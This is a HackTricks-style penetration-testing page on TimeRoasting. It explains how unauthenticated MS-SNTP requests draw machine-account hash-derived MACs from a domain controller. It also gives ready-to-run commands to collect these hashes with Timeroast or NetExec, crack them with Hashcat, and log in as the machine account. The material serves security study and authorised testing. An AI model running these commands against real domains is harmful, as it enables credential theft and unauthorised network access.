timeroasting.md (4049B)
1 --- 2 title: "TimeRoasting" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/TimeRoasting.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/TimeRoasting.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # TimeRoasting 14 15 TimeRoasting abuses legacy MS-SNTP authentication. An unauthenticated client can send a 68-byte request containing a chosen computer-account RID. For the exploitable legacy path, the domain controller derives the response authenticator through Netlogon using the computer account's NT hash (the MD4-derived password secret), giving the attacker a challenge/MAC pair suitable for offline password guessing (Hashcat mode 31300).<sup>[[1]](#references)[[2]](#references)</sup> 16 17 Sections 3.1.5.1 and 4 of MS-SNTP describe the request and response behavior:<sup>[[1]](#references)</sup> 18  19 When `ExtendedAuthenticatorSupported` is false, the request stores the RID in the low 31 bits of the authenticator's Key Identifier and a selector bit in the high bit. The server verifies the 68-byte length, extracts the RID, asks Netlogon to compute the candidate checksums, selects one using that high bit, zeroes the response Key Identifier, and returns the selected checksum.<sup>[[1]](#references)</sup> 20 21 The crypto-checksum is MD5-based (see 3.2.5.1.1) and can be cracked offline, enabling the roasting attack.<sup>[[1]](#references)</sup> 22 23 ## How to Attack 24 25 [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort<sup>[[3]](#references)</sup> 26 27 ```bash 28 sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt 29 hashcat -m 31300 ntp-hashes.txt 30 ``` 31 32 --- 33 34 ## Practical attack (unauth) with NetExec + Hashcat 35 36 - NetExec's `timeroast` module can enumerate computer RIDs, collect MS-SNTP MACs without authentication, and print `$sntp-ms$` hashes ready for cracking:<sup>[[4]](#references)</sup> 37 38 ```bash 39 # Target the DC (UDP/123). NetExec auto-crafts per-RID MS-SNTP requests 40 netexec smb <dc_fqdn_or_ip> -M timeroast 41 # Output example lines: $sntp-ms$*<rid>*md5*<salt>*<mac> 42 ``` 43 44 - Crack offline with Hashcat mode 31300 (MS-SNTP MAC):<sup>[[5]](#references)</sup> 45 46 ```bash 47 hashcat -m 31300 timeroast.hashes /path/to/wordlist.txt --username 48 # or let recent hashcat auto-detect; keep RIDs with --username for convenience 49 ``` 50 51 - The recovered cleartext corresponds to a computer account password. Try it directly as the machine account using Kerberos (-k) when NTLM is disabled: 52 53 ```bash 54 # Example: cracked for RID 1125 -> likely IT-COMPUTER3$ 55 netexec smb <dc_fqdn> -u IT-COMPUTER3$ -p 'RecoveredPass' -k 56 ``` 57 58 ### Operational notes 59 - Ensure accurate time before using recovered credentials with Kerberos. Prefer a maintained NTP client such as `chronyd`/`systemd-timesyncd`; `ntpdate` is retained here as a common lab command: `sudo ntpdate <dc_fqdn>`. 60 - If needed, generate krb5.conf for the AD realm: `netexec smb <dc_fqdn> --generate-krb5-file krb5.conf` 61 - Map RIDs to principals later via LDAP/BloodHound once you have any authenticated foothold. 62 63 ## References 64 65 - [1] [MS-SNTP: Microsoft Simple Network Time Protocol](https://winprotocoldoc.z19.web.core.windows.net/MS-SNTP/%5bMS-SNTP%5d.pdf) 66 - [2] [Secura – Timeroasting whitepaper](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) 67 - [3] [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) 68 - [4] [NetExec — `timeroast` module source](https://github.com/Pennyw0rth/NetExec/blob/main/nxc/modules/timeroast.py) 69 - [5] [Hashcat mode 31300 – MS-SNTP](https://hashcat.net/wiki/doku.php?id=example_hashes)